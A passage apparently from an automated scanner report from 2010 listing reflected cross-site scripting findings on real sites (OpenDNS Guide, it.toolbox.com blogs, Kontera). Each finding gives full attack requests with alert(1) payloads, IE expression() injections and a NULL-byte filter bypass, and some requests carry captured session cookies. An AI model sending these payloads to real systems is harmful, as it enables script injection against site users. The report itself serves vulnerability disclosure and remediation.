fpc10002134856462=bmVcHWxK|7EROHGOKaa|fses10002134856462=|U0QMKvOKaa|bmVcHWxK|fvis10002134856462=ZT1odHRwJTNBJTJGJTJGZ3VpZGUub3BlbmRucy5jb20lMkYlM0YmZj1odHRwJTNBJTJGJTJGZ3VpZGUub3BlbmRucy5jb20lMkZtYWluJTNGdXJsJTNEd2F0ZXJsb29ra2lvc2suY29tJmI9T3BlbkROUw==|8s7YH77Too|8s7YH77Too|8s7YH77Too|s|8s7YH77Too|8s7YH77Too
The value of the servfail request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aaa20"><script>alert(1)</script>f86a3d0a3b2 was submitted in the servfail parameter. This input was echoed as aaa20\"><script>alert(1)</script>f86a3d0a3b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?url=advancedmags%2Ecom&servfailaaa20"><script>alert(1)</script>f86a3d0a3b2 HTTP/1.1 Host: guide.opendns.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmx=207386316.00012306182230551517:3:1; __utmxx=207386316.00012306182230551517:1774337:2592000; __utmz=207386316.1290264528.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207386316.633541220.1290264528.1290264528.1290264528.1; OPENDNS_ACCOUNT=05ac4ddebab905eed8c88999fa18bb80; OUN=m7PsKwIJcKYMvq1Mcmca8ErKsy7gUMliFZtnhIcTeYEfDFi%2FLKrtpFf%2FnhOY7xPYbwM7oqMT0lRSv6jNwyns7IGjxJG4T5kWvFRZCZS51akAp0EDEXguqEV%2Fa%2BhBQG7c5OQqfjcWJJBMU71JluOvBvv3gVCVfwdG; t=0-1298937600; LPUID=46e52ed1-9c3b-c374-31b5-d84715b8ceb4; __qca=P0-2135470522-1290702286339; fpc10002134856462=bmVcHWxK|7EROHGOKaa|fses10002134856462=|U0QMKvOKaa|bmVcHWxK|fvis10002134856462=ZT1odHRwJTNBJTJGJTJGZ3VpZGUub3BlbmRucy5jb20lMkYlM0YmZj1odHRwJTNBJTJGJTJGZ3VpZGUub3BlbmRucy5jb20lMkZtYWluJTNGdXJsJTNEd2F0ZXJsb29ra2lvc2suY29tJmI9T3BlbkROUw==|8s7YH77Too|8s7YH77Too|8s7YH77Too|s|8s7YH77Too|8s7YH77Too
The value of the oq request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e188"style%3d"x%3aexpression(alert(1))"49e9ed40a9e was submitted in the oq parameter. This input was echoed as 2e188"style="x:expression(alert(1))"49e9ed40a9e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.0 200 OK Cache-Control: no-cache, must-revalidate Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Type: text/html; charset=utf-8 Pragma: no-cache P3P: policyref="http://www.opendns.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" Set-Cookie: LPSID=a944f3f0-0f32-35b4-25a0-c882a6d7a22b; path=/; domain=opendns.com Connection: close Date: Mon, 29 Nov 2010 16:30:34 GMT Server: OpenDNS Guide
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef6b1"style%3d"x%3aexpression(alert(1))"40d02cbd60b was submitted in the q parameter. This input was echoed as ef6b1"style="x:expression(alert(1))"40d02cbd60b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.0 200 OK Cache-Control: no-cache, must-revalidate Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Type: text/html; charset=utf-8 Pragma: no-cache P3P: policyref="http://www.opendns.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" Set-Cookie: LPSID=287d9e9a-277f-f954-5d9c-69f6284d919b; path=/; domain=opendns.com Connection: close Date: Mon, 29 Nov 2010 16:30:28 GMT Server: OpenDNS Guide
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 895fb"style%3d"x%3aexpr/**/ession(alert(1))"61cea859924 was submitted in the url parameter. This input was echoed as 895fb"style="x:expr/**/ession(alert(1))"61cea859924 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.0 200 OK Cache-Control: no-cache, must-revalidate Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Type: text/html; charset=utf-8 Pragma: no-cache P3P: policyref="http://www.opendns.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" Set-Cookie: LPSID=81663bdb-28a2-4064-a13e-7df454e37cbf; path=/; domain=opendns.com Connection: close Date: Mon, 29 Nov 2010 16:29:54 GMT Server: OpenDNS Guide
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.23. http://it.toolbox.com/blogs/database-soup [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/database-soup
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ee39'-alert(1)-'29b91f41874 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/database-soup?7ee39'-alert(1)-'29b91f41874=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 29 Nov 2010 17:06:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 60178
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Database So ...[SNIP]... aBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3ddatabase-soup%267ee39'-alert(1)-'29b91f41874%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
1.24. http://it.toolbox.com/blogs/database-talk [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/database-talk
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bab34'-alert(1)-'072c4aebae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/database-talk?bab34'-alert(1)-'072c4aebae=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 29 Nov 2010 17:06:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 62580
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Database Ta ...[SNIP]... aBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3ddatabase-talk%26bab34'-alert(1)-'072c4aebae%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
1.25. http://it.toolbox.com/blogs/db2luw [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/db2luw
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 650b8'-alert(1)-'f4afc2e525 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/db2luw?650b8'-alert(1)-'f4afc2e525=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 29 Nov 2010 17:06:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 62080
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> An Expert's ...[SNIP]... r != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3ddb2luw%26650b8'-alert(1)-'f4afc2e525%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
1.26. http://it.toolbox.com/blogs/db2zos [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/db2zos
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f58e'-alert(1)-'2ae9d2c2651 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/db2zos?6f58e'-alert(1)-'2ae9d2c2651=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 29 Nov 2010 17:06:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 78765
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Getting the ...[SNIP]... r != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3ddb2zos%266f58e'-alert(1)-'2ae9d2c2651%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
1.27. http://it.toolbox.com/blogs/elsua [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/elsua
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a46c1'-alert(1)-'51ddbdc9083 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/elsua?a46c1'-alert(1)-'51ddbdc9083=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 29 Nov 2010 17:06:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 63621
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> elsua: The ...[SNIP]... er != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3delsua%26a46c1'-alert(1)-'51ddbdc9083%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
1.28. http://it.toolbox.com/blogs/juice-analytics [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/juice-analytics
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99a6f'-alert(1)-'92e78444f0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/juice-analytics?99a6f'-alert(1)-'92e78444f0f=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 29 Nov 2010 17:06:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 61040
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Juice Analy ...[SNIP]... tnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3djuice-analytics%2699a6f'-alert(1)-'92e78444f0f%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
1.29. http://it.toolbox.com/blogs/minimalit [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/minimalit
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88e2f'-alert(1)-'ef739976327 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/minimalit?88e2f'-alert(1)-'ef739976327=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 29 Nov 2010 17:06:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 59534
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Minimal IT: ...[SNIP]... = ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dminimalit%2688e2f'-alert(1)-'ef739976327%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
1.30. http://it.toolbox.com/blogs/penguinista-databasiensis [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/penguinista-databasiensis
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eeadc'-alert(1)-'3bb1edec4a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/penguinista-databasiensis?eeadc'-alert(1)-'3bb1edec4a3=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 29 Nov 2010 17:06:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 45465
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Penguinista ...[SNIP]...
1.31. http://it.toolbox.com/blogs/ppmtoday [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/ppmtoday
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab562'-alert(1)-'9b9ed2ddc2d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday?ab562'-alert(1)-'9b9ed2ddc2d=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 29 Nov 2010 17:06:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 62724
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26ab562'-alert(1)-'9b9ed2ddc2d%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b77a2"%3balert(1)//3e3ba67956d was submitted in the l parameter. This input was echoed as b77a2";alert(1)//3e3ba67956d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KonaGet.js?u=1291038775232&p=153980&k=http%3A//webcache.googleusercontent.com/search%3Fq%3Dcache%3AcyhBgjTvtJEJ%3Adivorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment%26cd%3D2%26hl%3Den%26ct%3Dclnk%26gl%3DusjpNNP3&al=1&l=http%3A//webcache.googleusercontent.com/search%3Fq%3Dcache%3AcyhBgjTvtJEJ%3Adivorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment%26cd%3D2%26hl%3Den%26ct%3Dclnk%26gl%3Dusb77a2"%3balert(1)//3e3ba67956d&t=Ab%26onment+meaning+%7C+Massachusetts+Divorce+Law+Dictionary&m1=Legal+Dictionary+%2C+Legal+definition+%2C+Legal+interpretation+%2C+Legal+terms+%2C+Legal+terminology+%2C+Legal+ency&rId=0&rl=0&1=14&mod=536936475&rm=1&dc_aff_id=&add=FlashVer_Shockwave%20Flash%2010.1%20r103|user_|session_ HTTP/1.1 Host: kona40.kontera.com Proxy-Connection: keep-alive Referer: http://webcache.googleusercontent.com/search?q=cache:cyhBgjTvtJEJ:divorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment&cd=2&hl=en&ct=clnk&gl=us Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: KONA_USER_GUID=56D74502-D65A-11DF-A763-0016D1111177; cluid=-2494676081286926934173; imprs=1
Response
HTTP/1.0 200 OK Content-Type: text/plain Content-Length: 1128
The value of the rId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %009c46d"-alert(1)-"bff267b9f90 was submitted in the rId parameter. This input was echoed as 9c46d"-alert(1)-"bff267b9f90 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /KonaGet.js?u=1291038775232&p=153980&k=http%3A//webcache.googleusercontent.com/search%3Fq%3Dcache%3AcyhBgjTvtJEJ%3Adivorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment%26cd%3D2%26hl%3Den%26ct%3Dclnk%26gl%3DusjpNNP3&al=1&l=http%3A//webcache.googleusercontent.com/search%3Fq%3Dcache%3AcyhBgjTvtJEJ%3Adivorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment%26cd%3D2%26hl%3Den%26ct%3Dclnk%26gl%3Dus&t=Ab%26onment+meaning+%7C+Massachusetts+Divorce+Law+Dictionary&m1=Legal+Dictionary+%2C+Legal+definition+%2C+Legal+interpretation+%2C+Legal+terms+%2C+Legal+terminology+%2C+Legal+ency&rId=287024511125213104%009c46d"-alert(1)-"bff267b9f90&rl=0&i=14&n=0&dc_aff_id=&cl=0&mp=0&rm=1&mod=536936475&rt=0&st=1&add=FlashVer_Shockwave%20Flash%2010.1%20r103|user_|session_&1291038778341 HTTP/1.1 Host: kona40.kontera.com Proxy-Connection: keep-alive Referer: http://webcache.googleusercontent.com/search?q=cache:cyhBgjTvtJEJ:divorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment&cd=2&hl=en&ct=clnk&gl=us Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: KONA_USER_GUID=56D74502-D65A-11DF-A763-0016D1111177; cluid=-2494676081286926934173; imprs=1
Response
HTTP/1.0 200 OK Content-Type: text/plain Content-Length: 3417
The value of the rId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be16a"-alert(1)-"14499de9b36 was submitted in the rId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KonaGet.js?u=1291038775232&p=153980&k=http%3A//webcache.googleusercontent.com/search%3Fq%3Dcache%3AcyhBgjTvtJEJ%3Adivorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment%26cd%3D2%26hl%3Den%26ct%3Dclnk%26gl%3DusjpNNP3&al=1&l=http%3A//webcache.googleusercontent.com/search%3Fq%3Dcache%3AcyhBgjTvtJEJ%3Adivorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment%26cd%3D2%26hl%3Den%26ct%3Dclnk%26gl%3Dus&t=Ab%26onment+meaning+%7C+Massachusetts+Divorce+Law+Dictionary&m1=Legal+Dictionary+%2C+Legal+definition+%2C+Legal+interpretation+%2C+Legal+terms+%2C+Legal+terminology+%2C+Legal+ency&rId=0be16a"-alert(1)-"14499de9b36&rl=0&1=14&mod=536936475&rm=1&dc_aff_id=&add=FlashVer_Shockwave%20Flash%2010.1%20r103|user_|session_ HTTP/1.1 Host: kona40.kontera.com Proxy-Connection: keep-alive Referer: http://webcache.googleusercontent.com/search?q=cache:cyhBgjTvtJEJ:divorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment&cd=2&hl=en&ct=clnk&gl=us Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: KONA_USER_GUID=56D74502-D65A-11DF-A763-0016D1111177; cluid=-2494676081286926934173; imprs=1
Response
HTTP/1.0 200 OK Content-Type: text/plain Content-Length: 1188
